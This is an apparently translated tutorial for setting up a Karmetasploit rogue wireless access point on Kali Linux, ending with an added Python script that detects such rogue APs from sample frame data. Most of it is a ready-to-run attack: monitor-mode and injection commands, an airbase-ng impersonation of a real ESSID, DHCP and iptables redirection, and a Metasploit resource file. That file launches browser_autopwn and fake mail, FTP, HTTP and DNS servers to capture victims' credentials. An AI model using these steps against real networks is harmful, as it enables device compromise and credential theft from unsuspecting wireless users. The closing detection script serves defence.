Karmetasploit uses a forged wireless AP (access point) so that a client's wireless traffic passes through this AP, letting the attacking machine analyse that traffic or inject exploits into the client's applications to achieve a compromise. Not every wireless card can forge an AP, however: your card must support monitor mode and injection mode. See the list on the Aircrack-NG Compatibility Page.
Kali already has the airmon-ng suite and Karmetasploit installed, but the related configuration still has to be completed before they can be used in practice. The steps are as follows:
1. Karmetasploit's fake AP needs a DHCP service behind it. Use service --status-all to check whether dhcpd is already running; if it is not, install and configure the dhcpd service first:
(1) Install it: apt-get install isc-dhcp-server
(2) Build the dhcpd.conf content: create a file named dhcpd.conf in the /etc directory, use /etc/dhcp/dhcpd.conf or /etc/dhcp3/dhcpd.conf as a reference, and merge the following into /etc/dhcpd.conf:
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
(3) Start it: service isc-dhcp-server start
2. Run airodump-ng-oui-update (optional) to bring aircrack-ng's OUI database up to date.
3. Run airmon-ng start [WIFI-INTERFACE]
This switches your wireless card into monitor mode. [WIFI-INTERFACE] is your wireless interface name (mine is wlan0). If the command succeeds, a monitor interface named mon0 is created.
4. Run aireplay-ng --test [MONITOR-INTERFACE]
This tests whether the monitor interface supports injection. [MONITOR-INTERFACE] is the mon0 created in the previous step. If it succeeds, look carefully at which legitimate APs can be used as targets.
root@kali104:/# aireplay-ng --test mon0
02:19:20 Trying broadcast probe requests...
02:19:20 Injection is working!
02:19:22 Found 2 APs
02:19:22 Trying directed probe requests...
02:19:22 00:xx:01:xx:78:xx - channel: 11 - 'buffaloap'
02:19:22 Ping (min/avg/max): 1.759ms/12.232ms/65.397ms Power: 7.36
02:19:22 28/30: 93%
02:19:22 06:xx:B3:xx:02:xx - channel: 11 - 'linksys'
02:19:23 Ping (min/avg/max): 3.184ms/3.682ms/6.579ms Power: -128.00
02:19:23 30/30: 100%
From the messages above, both "buffaloap" and "linksys" can be injected into, so either can be attacked! Below, linksys is used as the test target.
With the wireless card confirmed to work in both monitor and injection modes, the next step is to set up the Karmetasploit environment.
5. Open Console window 1 and run (leave the Console open after it runs):
root@kali104:/# airbase-ng -P -C 30 -e "linksys" -v mon0
In the command above, linksys is the target we are impersonating and mon0 is the identifier of our card in monitor mode. After it runs successfully, note the first line of the output: Created tap interface at0. This at0 is the interface that serves the victim clients' network.
6. Next, open Console window 2 and run the following commands in order:
root@kali104:/# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@kali104:/# dhcpd -cf /etc/dhcpd.conf at0
7. Prepare the resource file Metasploit will use (karma.rc; you can copy the content below into a text file yourself or download it from the web). We save karma.rc in the /etc directory:
# load db_sqlite3 # Metasploit already ships with PostgreSQL, so this line can be omitted
# db_create /root/karma.db # just use msfconsole's msf3 database
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
run
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run
use auxiliary/server/capture/ftp
run
use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run
use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run
use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run
use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run
use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run
8. Start Karmetasploit:
root@kali104:/# msfconsole -r /etc/karma.rc
Alternatively, after entering msfconsole, loading it with resource karma.rc also works.
9. Now wait for the prey to come knocking! (How to dissect the captured data will be covered next time.)
For easy reference, I have condensed the steps above as follows; console1 and console2 are the two Console windows to open.
| console 1 | console 2 |
| --- | --- |
| # airmon-ng start wlan0 'enable the monitoring interface | # ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 'bring up the at0 interface |
| # aireplay-ng --test mon0 'see which APs can be injected into | # dhcpd -cf /etc/dhcpd.conf at0 'give at0 DHCP server functionality |
| # airbase-ng -P -C 30 -e "linksys" -v mon0 'start injecting/listening ... from here on signals start coming in (do not close the console); watch the first line, it will show "Created tap interface at0"!!! | # msfconsole -r /etc/karma.rc 'enter Metasploit ... once inside msfconsole, wait quietly; if Metasploit's exploitation succeeds a "complete" message pops up and you can proceed with further operations!!! |
PS: When a client first joins the Karmetasploit router it may still hold earlier DNS cache entries, and it will connect straight to the previously resolved target IP using that cached result instead of being sent to Metasploit's DNS module for lookup. To stop clients escaping our DNS trap this way, iptables can be modified so that all packets flowing to this AP are redirected into this system.
root@kali104:/# iptables -t nat -A PREROUTING -i at0 -j REDIRECT
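Seen from the defender's side, the setup above leaves a clear fingerprint: airbase-ng -P answers every probe request with whatever ESSID the client asked for, so a Karma AP shows up as one BSSID advertising many unrelated ESSIDs, and an ESSID the site already owns (linksys in this walkthrough) appears from a foreign BSSID. The Python script below is an added example, not part of the original post; the frame observations, the BSSIDs and the authorised AP inventory are all constructed sample data.

```python
"""Flag Karma-style rogue APs from observed beacon / probe-response frames.

airbase-ng -P answers every probe request, so one BSSID ends up advertising
many unrelated ESSIDs (-C also beacons them for a while). A legitimate AP
advertises one or a handful. We also flag an ESSID that belongs to a known,
authorised BSSID but is seen from another one (evil twin).
"""
from collections import defaultdict

# Constructed sample observations: (frame type, BSSID, ESSID). BSSIDs and
# ESSIDs are made up; "linksys" mirrors the ESSID used in the walkthrough.
OBSERVATIONS = [
    ("beacon",     "00:11:22:33:44:55", "linksys"),
    ("beacon",     "00:11:22:33:44:55", "linksys"),
    ("beacon",     "66:77:88:99:aa:bb", "buffaloap"),
    ("probe-resp", "de:ad:be:ef:00:01", "linksys"),
    ("probe-resp", "de:ad:be:ef:00:01", "CoffeeShop_WiFi"),
    ("probe-resp", "de:ad:be:ef:00:01", "Airport_Free"),
    ("probe-resp", "de:ad:be:ef:00:01", "HomeNet"),
    ("beacon",     "de:ad:be:ef:00:01", "HomeNet"),
]

# Constructed authorised inventory, ESSID -> BSSID. In production this would
# come from the site's AP asset list.
AUTHORISED = {"linksys": "00:11:22:33:44:55", "buffaloap": "66:77:88:99:aa:bb"}


def find_rogue_aps(observations, authorised, max_essids=3):
    """Return {BSSID: [reasons]} for every BSSID that looks like a rogue AP."""
    essids_by_bssid = defaultdict(set)
    for _frame, bssid, essid in observations:
        essids_by_bssid[bssid].add(essid)

    findings = defaultdict(list)
    for bssid, essids in essids_by_bssid.items():
        # Karma signature: one radio answering for many unrelated networks.
        if len(essids) > max_essids:
            findings[bssid].append(f"advertises {len(essids)} distinct ESSIDs")
        # Evil-twin signature: an authorised ESSID seen from a foreign BSSID.
        for essid in sorted(essids):
            if essid in authorised and authorised[essid] != bssid:
                findings[bssid].append(f"impersonates authorised ESSID '{essid}'")
    return dict(findings)


if __name__ == "__main__":
    for bssid, reasons in find_rogue_aps(OBSERVATIONS, AUTHORISED).items():
        print(bssid, "->", "; ".join(reasons))
```

On the sample data only de:ad:be:ef:00:01 is reported, for both reasons; tune max_essids to the number of ESSIDs your own multi-SSID APs legitimately announce.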